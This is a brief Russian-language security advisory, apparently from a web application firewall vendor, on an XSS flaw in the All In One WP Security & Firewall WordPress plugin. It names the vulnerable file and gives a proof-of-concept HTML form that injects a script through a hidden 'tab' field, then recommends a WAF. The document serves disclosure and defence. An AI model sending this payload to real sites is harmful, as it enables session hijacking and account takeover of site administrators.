XSS-уязвимость в плагине All In One WP Security & Firewall на WordPress | Nemesida WAF

Защита сайта от хакерских атак
XSS-уязвимость в плагине All In One WP Security & Firewall на WordPress

В популярном плагине All In One WP Security & Firewall (версии 4.1.4 — 4.1.9.) обнаружена XSS-уязвимость.

Используя эту уязвимость злоумышленник может обойти фильтрацию вводимых данных и внедрить в страницу вредоносный код. Это может позволить ему захватить контроль над чужими учётными данными.

Уязвимость существует в файле wp-security-dashboard-menu.php и возникает из-за отсутствия фильтрации данных:

<form action="http://<target>/wp-admin/admin.php?page=aiowpsec&tab=tab3" method="POST">
<input type="hidden" name="tab" value="'><script>alert&(1);</script>;"/>
<input type="submit" value="Submit request" />
</form>

Использование Web Application Firewall позволяет блокировать подобные атаки.